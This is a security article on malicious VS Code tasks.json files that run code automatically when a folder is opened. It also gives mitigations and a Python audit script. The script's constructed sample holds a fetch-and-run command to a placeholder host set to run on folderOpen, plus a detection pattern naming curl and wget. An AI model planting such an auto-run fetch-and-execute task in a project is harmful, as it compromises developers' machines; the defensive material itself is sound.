How Malicious tasks.json Can Auto‑Run Code in VS Code and How to Protect Yourself

Security researchers uncovered a vulnerability where malicious code hidden in a VS Code tasks.json file can execute automatically when a folder is opened, prompting a discussion of VS Code's safeguards, the attack's capabilities, and practical steps developers can take to mitigate the risk.


Security researchers recently discovered a new code‑repository vulnerability in which malicious commands are embedded in a tasks.json file. When VS Code opens a folder containing this file, the task can be executed automatically.

tasks.json lets developers integrate command‑line tools into the editor and optionally run them automatically when the folder is opened. The file lives in the hidden .vscode directory of a repository.

VS Code has two safeguards: the “Allow Automatic Tasks” setting (enabled by default) and the default “untrusted workspace” mode, which prevents tasks from running in untrusted folders and shows a warning dialog (“process needs to execute code”). However, the dialog pre‑selects the “Continue” button, and the “Trust parent folder” option causes new subfolders created under that parent, such as a freshly cloned repository, to be trusted automatically.

The reported case contains a backdoor that enables remote code execution, system fingerprinting, and persistent C2 communication. The attacker abuses the OS‑specific command feature of tasks.json to run a different payload on macOS, Windows and Linux. The malicious JavaScript payload is fetched via curl from a remote server.

The malicious repository was hosted on GitHub (since removed) while the JavaScript payload was served from Vercel, so the payload lived outside the repository and was harder for GitHub's security scanners to detect.

Mitigation recommendations include: thoroughly reviewing repository contents, including the .vscode directory, before marking a folder trusted; being cautious with third‑party code; and performing development in isolated or temporary environments such as containers. Using containers as the default workflow limits the impact of executing untrusted code.
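One way to apply the first recommendation before trusting a folder, as an added example that is not from the article or from VS Code itself: a small Python audit of .vscode/tasks.json that strips JSONC comments, flags every task set to run on folderOpen, and notes OS‑specific overrides and network fetches. The sample file and its hostname are constructed for the example.

```python
import json
import re
# Constructed sample (not the real repository's file): one task auto-runs on folder open and
# swaps in a different command per OS, as the article describes. The hostname is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  // tasks.json is JSONC: comments are allowed, so the scanner must strip them first
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build",
     "windows": {"command": "curl -s https://example.invalid/p.js -o p.js && node p.js"},
     "osx": {"command": "curl -s https://example.invalid/p.js -o p.js && node p.js"},
     "runOptions": {"runOn": "folderOpen"}}
  ]
}'''

OS_KEYS = ("windows", "osx", "linux")
NETWORK_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.IGNORECASE)

def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments but copy string literals verbatim, so URLs survive."""
    out, i, n = [], 0, len(text)
    while i < n:
        if text[i] == '"':
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == "\\" else 1
            out.append(text[i:j + 1]); i = j + 1
        elif text.startswith("//", i):
            nl = text.find("\n", i); i = n if nl < 0 else nl
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2); i = n if end < 0 else end + 2
        else:
            out.append(text[i]); i += 1
    return "".join(out)

def audit_tasks(text: str) -> list:
    """Return one finding per task that auto-runs on folderOpen, listing why it is risky."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue  # tasks that only run on demand are not the concern here
        reasons = ["runs automatically on folderOpen"]
        per_os = [k for k in OS_KEYS if isinstance(task.get(k), dict)]
        if per_os: reasons.append("OS-specific commands: " + ", ".join(per_os))
        for scope, section in [("all", task)] + [(k, task[k]) for k in per_os]:
            cmd = " ".join(map(str, [section.get("command", "")] + section.get("args", [])))
            if NETWORK_RE.search(cmd):
                reasons.append(f"fetches from the network ({scope}): {cmd}")
        findings.append({"label": task.get("label", "<unnamed>"), "reasons": reasons})
    return findings
```

Run it against a cloned repository's .vscode/tasks.json before marking the folder trusted; the OS‑specific and network checks are heuristics, so treat findings as prompts for manual review rather than verdicts.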

Tags: Containerization, VS Code, malicious code, tasks.json
Written by 21CTO
